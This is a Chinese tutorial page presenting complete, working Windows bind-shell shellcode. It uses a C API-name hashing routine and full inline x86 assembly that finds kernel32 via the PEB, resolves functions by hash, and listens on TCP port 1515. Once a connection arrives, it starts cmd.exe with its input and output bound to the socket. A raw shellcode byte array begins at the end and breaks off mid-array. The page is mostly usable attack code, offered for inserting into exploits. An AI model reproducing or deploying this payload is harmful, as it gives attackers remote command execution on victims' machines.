摘要:本文主要向大家介绍了C/C++知识点之高级shellcode(Payload_Bindshell),通过具体的内容向大家展示,希望对大家学习C/C++知识点有所帮助。
本文主要向大家介绍了C/C++知识点之高级shellcode(Payload_Bindshell),通过具体的内容向大家展示,希望对大家学习C/C++知识点有所帮助。
<
<p>1.函数加密</p>
<pre><code class="hljs cpp"><span>//函数加密 摘要 (条件尽可能避免有0x00 尽可能避免发生碰撞)注意没有加.dll</span>
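// Hash_GetDigest: 32-bit rotate-right-by-7-then-add digest of a NUL-terminated
// byte string. It is the reference for the constants pushed as nHashDigest in
// the inline-asm listing on this page, where fun_Hash_CmpString recomputes the
// same digest over each export name.
// In:  strFunName - NUL-terminated name to digest (read only, never written)
// Out: the digest, passed back through int, so values >= 0x80000000 come back
//      negative; callers should compare it as an unsigned 32-bit value.
// Each byte is widened as unsigned char: `char` is signed by default on MSVC,
// so a byte >= 0x80 would otherwise sign-extend to 0xFFFFFFxx and the C digest
// would diverge from the asm version, which zero-extends via
// `xor eax,eax / mov al,[esi+ecx]`.
int Hash_GetDigest(char * strFunName) {
	unsigned int nDigest = 0;
	for (; *strFunName != '\0'; ++strFunName) {
		nDigest = (nDigest << 25) | (nDigest >> 7);   // ror32(nDigest, 7)
		nDigest += (unsigned char)*strFunName;
	}
	return nDigest;
}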
</code></pre>
<p>先运行试试 成功<br><img style="cursor: pointer;" src="//i2.51cto.com/images/blog/201806/05/54be8cc8e0f8122dca6b3685954f88db.png?x-oss-process=image/watermark,size_16,text_QDUxQ1RP5Y2a5a6i,color_FFFFFF,t_100,g_se,x_10,y_10,shadow_90,type_ZmFuZ3poZW5naGVpdGk=" alt="高级shellcode(Payload_Bindshell)"><br>测试shellcode 正常(注意win下要手动去开启telnet服务)<br><img style="cursor: pointer;" src="//i2.51cto.com/images/blog/201806/05/2281b1e350e1b907b6a12df3817a9776.png?x-oss-process=image/watermark,size_16,text_QDUxQ1RP5Y2a5a6i,color_FFFFFF,t_100,g_se,x_10,y_10,shadow_90,type_ZmFuZ3poZW5naGVpdGk=" alt="高级shellcode(Payload_Bindshell)"><br>把shellcode放入异常处就可以了</p>
<pre><code class="hljs objectivec"><span>// ConsoleApplication2.cpp : 定义控制台应用程序的入口点。</span>
<span>//</span>
<span>#include <span>"stdafx.h"</span></span>
<span>//函数加密摘要 (条件尽可能避免有0x00 尽可能避免发生碰撞)注意没有加.dll</span>
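// Hash_GetDigest: 32-bit rotate-right-by-7-then-add digest of a NUL-terminated
// byte string. The nHashDigest constants pushed in the inline asm below were
// produced with this routine, and fun_Hash_CmpString recomputes the same
// digest over each export name when matching.
// In:  strFunName - NUL-terminated name to digest (read only, never written)
// Out: the digest, passed back through int, so values >= 0x80000000 come back
//      negative; compare it as an unsigned 32-bit value.
// Each byte is widened as unsigned char: `char` is signed by default on MSVC,
// so a byte >= 0x80 would otherwise sign-extend to 0xFFFFFFxx and this C
// digest would diverge from fun_Hash_CmpString, which zero-extends via
// `xor eax,eax / mov al,[esi+ecx]`.
int Hash_GetDigest(char * strFunName) {
	unsigned int nDigest = 0;
	for (; *strFunName != '\0'; ++strFunName) {
		nDigest = (nDigest << 25) | (nDigest >> 7);   // ror32(nDigest, 7)
		nDigest += (unsigned char)*strFunName;
	}
	return nDigest;
}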
<span>int</span> _tmain(<span>int</span> argc, _TCHAR* argv[])
{
__<span>asm</span>
{
SUB ESP, <span>0x20</span> <span>// 开辟一段栈空间,增加健壮性</span>
push ebp
mov ebp, esp
sub esp, <span>0x10</span>
JMP tag_Shellcode <span>// 前置代码,避免后面的数据被解释为指令</span>
<span>// [tag_Next-0x25] "cmd.exe\0"</span>
_<span>asm</span> _emit(<span>0x63</span>)_<span>asm</span> _emit(<span>0x6D</span>)_<span>asm</span> _emit(<span>0x64</span>)_<span>asm</span> _emit(<span>0x2E</span>)
_<span>asm</span> _emit(<span>0x65</span>)_<span>asm</span> _emit(<span>0x78</span>)_<span>asm</span> _emit(<span>0x65</span>)_<span>asm</span> _emit(<span>0x00</span>)
<span>// [tag_Next-0x1D] "ws2_32.dll\0"</span>
_<span>asm</span> _emit(<span>0x77</span>)_<span>asm</span> _emit(<span>0x73</span>)_<span>asm</span> _emit(<span>0x32</span>)_<span>asm</span> _emit(<span>0x5F</span>)
_<span>asm</span> _emit(<span>0x33</span>)_<span>asm</span> _emit(<span>0x32</span>)_<span>asm</span> _emit(<span>0x2E</span>)_<span>asm</span> _emit(<span>0x64</span>)
_<span>asm</span> _emit(<span>0x6C</span>)_<span>asm</span> _emit(<span>0x6C</span>)_<span>asm</span> _emit(<span>0x00</span>)
<span>// [tag_Next-0x12] "kernel32.dll\0"</span>
_<span>asm</span> _emit(<span>0x6B</span>)_<span>asm</span> _emit(<span>0x65</span>)_<span>asm</span> _emit(<span>0x72</span>)_<span>asm</span> _emit(<span>0x6E</span>)
_<span>asm</span> _emit(<span>0x65</span>)_<span>asm</span> _emit(<span>0x6C</span>)_<span>asm</span> _emit(<span>0x33</span>)_<span>asm</span> _emit(<span>0x32</span>)
_<span>asm</span> _emit(<span>0x2E</span>)_<span>asm</span> _emit(<span>0x64</span>)_<span>asm</span> _emit(<span>0x6C</span>)_<span>asm</span> _emit(<span>0x6C</span>)
_<span>asm</span> _emit(<span>0x00</span>)
tag_Shellcode:
<span>// 1. GetPC</span>
<span>CALL</span> tag_Next
tag_Next :
pop ebx <span>// ebx = BaseAddr</span>
mov[ebp - <span>0x04</span>], ebx <span>// Local_1 = Shellcode BaseAddr</span>
<span>// 2. 获取关键模块基址</span>
mov esi, dword ptr fs : [<span>0x30</span>] <span>// esi = PEB的地址</span>
mov esi, [esi + <span>0x0C</span>] <span>// esi = 指向PEB_LDR_DATA结构的指针</span>
mov esi, [esi + <span>0x1C</span>] <span>// esi = 模块链表指针InInit...List</span>
mov esi, [esi] <span>// esi = 访问链表中的第二个条目</span>
mov edx, [esi + <span>0x08</span>] <span>// edx = 获取Kernel32.dll基址</span>
<span>// 3. 获取LoadLibraryExA的函数地址</span>
push edx <span>// ImageBase = Kernel32.dll</span>
push <span>0xC0D83287</span> <span>// nHashDigest = LoadLibraryExA Digest</span>
call fun_GetFunAddrByHash <span>// fun_GetFunAddrByHash</span>
mov edi, eax <span>// edi = LoadLibraryExA</span>
<span>// 4. 加载Kernel32.dll,增强兼容新(Win7取得的是KernelBase.dll的基址)</span>
lea esi, [ebx - <span>0x12</span>] <span>// eax = "kernel32.dll\0"</span>
push <span>0</span> <span>// /-dwFlags = 0</span>
push <span>0</span> <span>// |-hFile = 0</span>
push esi <span>// |-lpLibFileName = "kernel32.dll"</span>
call edi <span>// LoadLibraryExA()</span>
mov[ebp - <span>0x08</span>], eax <span>// Local_2 = Kernel32.dll基址</span>
<span>// 5. 加载ws2_32.dll,以方便后面的网络通信编程</span>
lea esi, [ebx - <span>0x1D</span>] <span>// eax = "ws2_32.dll\0"</span>
push <span>0</span> <span>// /-dwFlags = 0</span>
push <span>0</span> <span>// |-hFile = 0</span>
push esi <span>// |-lpLibFileName = "ws2_32.dll"</span>
call edi <span>// LoadLibraryExA()</span>
mov[ebp - <span>0x0C</span>], eax <span>// Local_3 = ws2_32.dll基址</span>
<span>// 6. 调用Payload部分</span>
push[ebp - <span>0x0C</span>] <span>// ws2_32.dll基址</span>
push[ebp - <span>0x08</span>] <span>// Kernel32.dll基址</span>
push[ebp - <span>0x04</span>] <span>// BaseAddr</span>
call fun_Payload
<span>// 7. Payload执行完毕,结束程序,防止被调试分析</span>
push[ebp - <span>0x08</span>] <span>// ImageBase = Param_2(Kernel32.dll)</span>
push <span>0x4FD18963</span> <span>// nHashDigest = ExitProcess Digest </span>
call fun_GetFunAddrByHash <span>// fun_GetFunAddrByHash</span>
push <span>0</span> <span>// /-uExitCode = NULL</span>
call eax <span>// ExitProcess()</span>
mov esp, ebp
pop ebp
<span>/***********************************************************/</span>
<span>/* 函数:根据Hash值获取指定的函数地址,返回值为关键函数地址*/</span>
<span>/***********************************************************/</span>
fun_GetFunAddrByHash : <span>// (int nHashDigest, int ImageBase)</span>
push ebp
mov ebp, esp
sub esp, <span>0x0C</span>
push edx
<span>// 1. 获取EAT、ENT与EOT的地址</span>
mov edx, [ebp + <span>0x0C</span>] <span>// edx = Param_1(ImageBase)</span>
mov esi, [edx + <span>0x3C</span>] <span>// esi = IMAGE_DOS_HEADER.e_lfanew</span>
lea esi, [edx + esi] <span>// esi = PE文件头</span>
mov esi, [esi + <span>0x78</span>] <span>// esi = IMAGE_DIR...EXPORT.VirtualAddress</span>
lea esi, [edx + esi] <span>// esi = 导出表首地址</span>
mov edi, [esi + <span>0x1C</span>] <span>// esi = IMAGE_EXP...ORY.AddressOfFunctions</span>
lea edi, [edx + edi] <span>// edi = EAT首地址</span>
mov[ebp - <span>0x04</span>], edi <span>// Local_1 = edi = EAT首地址</span>
mov edi, [esi + <span>0x20</span>] <span>// edi = IMAGE_EXP...ORY.AddressOfNames</span>
lea edi, [edx + edi] <span>// edi = ENT首地址</span>
mov[ebp - <span>0x08</span>], edi <span>// Local_2 = edi = ENT首地址</span>
mov edi, [esi + <span>0x24</span>] <span>// edi = IMAGE_EXP...ORY.AddressOfNameOrdinals</span>
lea edi, [edx + edi] <span>// edi = EOT首地址</span>
mov[ebp - <span>0x0C</span>], edi <span>// Local_3 = edi = EOT首地址</span>
<span>// 2. 循环对比ENT中的函数名</span>
xor ecx, ecx
jmp tag_FirstCmp
tag_CmpFunNameLoop :
inc ecx
tag_FirstCmp :
mov esi, [ebp - <span>0x08</span>] <span>// esi = Local_2(ENT)</span>
mov esi, [esi + <span>4</span> * ecx] <span>// esi = ENT RVA</span>
mov edx, [ebp + <span>0x0C</span>] <span>// edx = Param_1(ImageBase)</span>
lea esi, [edx + esi] <span>// esi = ENT VA</span>
push[ebp + <span>0x08</span>] <span>// nDigest = Param_1(nHashDigest)</span>
push esi <span>// strFunName = ENT VA</span>
call fun_Hash_CmpString <span>// fun_Hash_CmpString</span>
test eax, eax
jz tag_CmpFunNameLoop <span>// 如果不相等则继续循环比对</span>
<span>// 3. 成功后找到对应的序号</span>
mov esi, [ebp - <span>0x0C</span>] <span>// esi = Local_3(EOT)</span>
xor edi, edi
mov di, [esi + ecx * <span>2</span>] <span>// edi = 用函数名数组下标在序号数组找到对应序号</span>
<span>// 4. 使用序号作为索引,找到函数名所对应的函数地址</span>
mov edx, [ebp - <span>0x04</span>] <span>// edx = Local_1(EAT)</span>
mov esi, [edx + edi * <span>4</span>] <span>// esi = 用序号在函数地址数组找到对应的函数地址</span>
mov edx, [ebp + <span>0x0C</span>] <span>// edx = Param_1(ImageBase)</span>
<span>// 5. 返回获取到的关键函数地址</span>
lea eax, [edx + esi] <span>// 返回GetProcAddress的地址</span>
pop edx
mov esp, ebp
pop ebp
retn <span>0x08</span>
<span>/***************************************************************/</span>
<span>/* 函数:根据摘要确认函数名,若函数名与此摘要相符返回1否则返回0*/</span>
<span>/***************************************************************/</span>
fun_Hash_CmpString: <span>//(char *strFunName, int nDigest)</span>
push ebp
mov ebp, esp
sub esp, <span>0x04</span> <span>// 开辟局部变量并清零</span>
mov dword ptr[ebp - <span>0x04</span>], <span>0x00</span>
push ebx <span>// 保存用到的寄存器</span>
push ecx
push edx
mov esi, [ebp + <span>0x08</span>] <span>// esi = Param_1(strFunName)</span>
xor ecx, ecx
xor eax, eax
tag_HashLoop :
mov al, [esi + ecx] <span>// al = 字符串的第ECX个字符</span>
test al, al <span>// 判断是否为0,为0结束循环</span>
jz tag_HashEnd
mov ebx, [ebp - <span>0x04</span>] <span>// ebx = Local_1(摘要)</span>
shl ebx, <span>0x19</span> <span>// ebx = 摘要<<0x19(25)</span>
mov edx, [ebp - <span>0x04</span>] <span>// edx = Local_1(摘要)</span>
shr edx, <span>0x07</span> <span>// edx = 摘要>>0x07(07)</span>
or ebx, edx <span>// edx = ebx|edx</span>
add ebx, eax <span>// edx = edx + 字符的ASCII</span>
mov[ebp - <span>0x04</span>], ebx
inc ecx <span>// ecx++</span>
jmp tag_HashLoop
tag_HashEnd :
mov ebx, [ebp + <span>0x0C</span>] <span>// ebx = Param_2(nDigest)</span>
mov edx, [ebp - <span>0x04</span>] <span>// edx = Local_1(摘要)</span>
xor eax, eax
cmp ebx, edx
jne tag_FunEnd
mov eax, <span>1</span>
tag_FunEnd:
pop edx
pop ecx
pop ebx
mov esp, ebp
pop ebp
retn <span>0x08</span>
<span>/**********************************/</span>
<span>/* 函数:有效载荷部分,返回值Null */</span>
<span>/**********************************/</span>
fun_Payload: <span>// (int BaseAddr, int Kernel32_Base, int ws2_32_Base)</span>
push ebp
mov ebp, esp
sub esp, <span>0x300</span>
<span>// 1. 初始化Winsock服务</span>
push[ebp + <span>0x10</span>] <span>// ImageBase = Param_3(ws2_32.dll)</span>
push <span>0x80B46A3D</span> <span>// nHashDigest = WSAStartup Digest</span>
call fun_GetFunAddrByHash <span>// fun_GetFunAddrByHash</span>
lea esi, [ebp - <span>0x300</span>] <span>// esi = WSADATA</span>
push esi <span>// /-lpWSAData = WSADATA</span>
push <span>0x0202</span> <span>// |-wVersionRequested = 2.2</span>
call eax <span>// WSAStartup()</span>
test eax, eax
jnz tag_PaloadEnd
<span>// 2. 创建一个原始套接字</span>
push[ebp + <span>0x10</span>] <span>// ImageBase = Param_3(ws2_32.dll)</span>
push <span>0xDE78322D</span> <span>// nHashDigest = WSASocketA Digest </span>
call fun_GetFunAddrByHash <span>// fun_GetFunAddrByHash</span>
push <span>0</span> <span>// /-dwFlags = NULL</span>
push <span>0</span> <span>// |-g = NULL</span>
push <span>0</span> <span>// |-lpProtocolInfo = NULL</span>
push <span>6</span> <span>// |-protocol = IPPROTO_TCP</span>
push <span>1</span> <span>// |-type = SOCK_STREAM</span>
push <span>2</span> <span>// |-af = AF_INET</span>
call eax <span>// WSASocketA()</span>
mov[ebp - <span>0x04</span>], eax <span>// Local_1 = SOCKET</span>
<span>// 3. 在任意地址(INADDR_ANY)上绑定一个端口1515[0x05BE-->0xBE05]</span>
push[ebp + <span>0x10</span>] <span>// ImageBase = Param_3(ws2_32.dll)</span>
push <span>0xDDA71064</span> <span>// nHashDigest = bind Digest </span>
call fun_GetFunAddrByHash <span>// fun_GetFunAddrByHash</span>
mov word ptr[ebp - <span>0x200</span>], <span>0x02</span> <span>// / SOCKADDR_IN.sin_family = AF_INET</span>
mov word ptr[ebp - <span>0x1FE</span>], <span>0xEB05</span> <span>// | SOCKADDR_IN.sin_port = 0xEB05(1515)</span>
mov dword ptr[ebp - <span>0x1FC</span>], <span>0</span> <span>// \ SOCKADDR_IN.sin_addr = INADDR_ANY </span>
lea esi, [ebp - <span>0x200</span>] <span>// esi = SOCKADDR_IN</span>
push <span>0x14</span> <span>// /-namelen = 0x14</span>
push esi <span>// |-name = SOCKADDR_IN</span>
push[ebp - <span>0x04</span>] <span>// |-s = Local_1(SOCKET)</span>
call eax <span>// bind()</span>
test eax, eax
jnz tag_PaloadEnd
<span>// 4. 监听申请的连接,队列中可容纳5个链接</span>
push[ebp + <span>0x10</span>] <span>// ImageBase = Param_3(ws2_32.dll)</span>
push <span>0x4BD39F0C</span> <span>// nHashDigest = listen Digest </span>
call fun_GetFunAddrByHash <span>// fun_GetFunAddrByHash</span>
push <span>0x7FFFFFFF</span> <span>// /-backlog = SOMAXCONN</span>
push[ebp - <span>0x04</span>] <span>// |-s = Local_1(SOCKET)</span>
call eax <span>// listen()</span>
test eax, eax
jnz tag_PaloadEnd
<span>// 5. 接受一个连接</span>
push[ebp + <span>0x10</span>] <span>// ImageBase = Param_3(ws2_32.dll)</span>
push <span>0x01971EB1</span> <span>// nHashDigest = accept Digest </span>
call fun_GetFunAddrByHash <span>// fun_GetFunAddrByHash</span>
push <span>0</span> <span>// /-addrlen = NULL</span>
push <span>0</span> <span>// |-addr = NULL</span>
push[ebp - <span>0x04</span>] <span>// |-s = Local_1(SOCKET)</span>
call eax <span>// accept()</span>
mov[ebp - <span>0x04</span>], eax <span>// Local_1(SOCKET) = SOCKET</span>
<span>// 6. 创建一个CMD进程,并将其输入与输出重定位到我们创建的套接字上</span>
push[ebp + <span>0x0C</span>] <span>// ImageBase = Param_2(Kernel32.dll)</span>
push <span>0x6BA6BCC9</span> <span>// nHashDigest = CreateProcessA Digest </span>
call fun_GetFunAddrByHash <span>// fun_GetFunAddrByHash</span>
mov edx, eax <span>// edx = CreateProcessA</span>
lea edi, [ebp - <span>0x90</span>] <span>// / 清空STARTUPINFOA</span>
mov ecx, <span>0x11</span> <span>// | STARTUPINFOA</span>
mov eax, <span>0x00</span> <span>// | 从[ebp-0x90]开始</span>
cld <span>// | 到[ebp-0x48]结束</span>
rep stosd <span>// |</span>
mov dword ptr[ebp - <span>0x90</span>], <span>0x00000044</span> <span>// | STA...A.cb = 48</span>
mov dword ptr[ebp - <span>0x64</span>], <span>0x00000100</span> <span>// | STA...A.dwFlags = STARTF_USESTDHANDLES</span>
mov word ptr[ebp - <span>0x60</span>], <span>0x0000</span> <span>// | STA...A.wShowWindow = SW_HIDE</span>
mov esi, [ebp - <span>0x04</span>] <span>// esi = Local_1(SOCKET)</span>
mov dword ptr[ebp - <span>0x58</span>], esi <span>// | STA...A.hStdInput = SOCKET</span>
mov dword ptr[ebp - <span>0x54</span>], esi <span>// | STA...A.hStdOutput = SOCKET</span>
mov dword ptr[ebp - <span>0x50</span>], esi <span>// \ STA...A.hStdError = SOCKET</span>
lea esi, [ebp - <span>0x90</span>] <span>// esi = STARTUPINFOA</span>
lea edi, [ebp - <span>0x200</span>] <span>// edi = PROCESS_INFORMATION </span>
mov ebx, [ebp + <span>0x08</span>] <span>// ebx = Param_1(BaseAddr)</span>
lea ebx, [ebx - <span>0x25</span>] <span>// ebx = "cmd.exe\0"</span>
push edi <span>// /-lpProcessInformation = PROCESS_INFORMATION</span>
push esi <span>// |-lpStartupInfo = STARTUPINFOA</span>
push <span>0</span> <span>// |-lpCurrentDirectory = NULL</span>
push <span>0</span> <span>// |-lpEnvironment = NULL</span>
push <span>0</span> <span>// |-dwCreationFlags = NULL</span>
push <span>1</span> <span>// |-bInheritHandles = TRUE</span>
push <span>0</span> <span>// |-lpThreadAttributes = NULL</span>
push <span>0</span> <span>// |-lpProcessAttributes = NULL</span>
push ebx <span>// |-lpCommandLine = "cmd.exe\0"</span>
push <span>0</span> <span>// |-lpApplicationName = NULL</span>
call edx <span>// CreateProcessA()</span>
tag_PaloadEnd :
mov esp, ebp
pop ebp
retn <span>0x0C</span>
}
<span>return</span> <span>0</span>;
}</code></pre>
<pre><code class="hljs java"><span><span>int</span> <span>_tmain</span><span>(<span>int</span> argc, _TCHAR* argv[])</span>
</span>{
<span>char</span> bShellcode[] = { <span>"\x83\xEC\x20\x55\x8B\xEC\x83\xEC\x10\xEB\x20\x63\x6D\x64\x2E\x65\x78\x65\x00\x77\x73\x32\x5F\x33\x32\x2E\x64\x6C\x6C\x00\x6B\x65\x72\x6E\x65\x6C\x33\x32\x2E\x64\x6C\x6C\x00\xE8\x00\x00\x00\x00\x5B\x89\x5D\xFC\x64\x8B\x35\x30\x00\x00\x00\x8B\x76\x0C\x8B\x76\x1C\x8B\x36\x8B\x56\x08\x52\x68\x87\x32\xD8\xC0\xE8\x3E\x00\x00\x00\x8B\xF8\x8D\x73\xEE\x6A\x00\x6A\x00\x56\xFF\xD7\x89\x45\xF8\x8D\x73\xE3\x6A\x00\x6A\x00\x56\xFF\xD7\x89\x45\xF4\xFF\x75\xF4\xFF\x75\xF8\xFF\x75\xFC\xE8\xCD\x00\x00\x00\xFF\x75\xF8\x68\x63\x89\xD1\x4F\xE8\x07\x00\x00\x00\x6A\x00\xFF\xD0\x8B\xE5\x5D\x55\x8B\xEC\x83\xEC\x0C\x52\x8B\x55\x0C\x8B\x72\x3C\x8D\x34\x32\x8B\x76\x78\x8D\x34\x32\x8B\x7E\x1C\x8D\x3C\x3A\x89\x7D\xFC\x8B\x7E\x20\x8D\x3C\x3A\x89\x7D\xF8\x8B\x7E\x24\x8D\x3C\x3A\x89\x7D\xF4\x33\xC9\xEB\x01\x41\x8B\x75\xF8\x8B\x34\x8E\x8B\x55\x0C\x8D\x34\x32\xFF\x75\x08\x56\xE8\x20\x00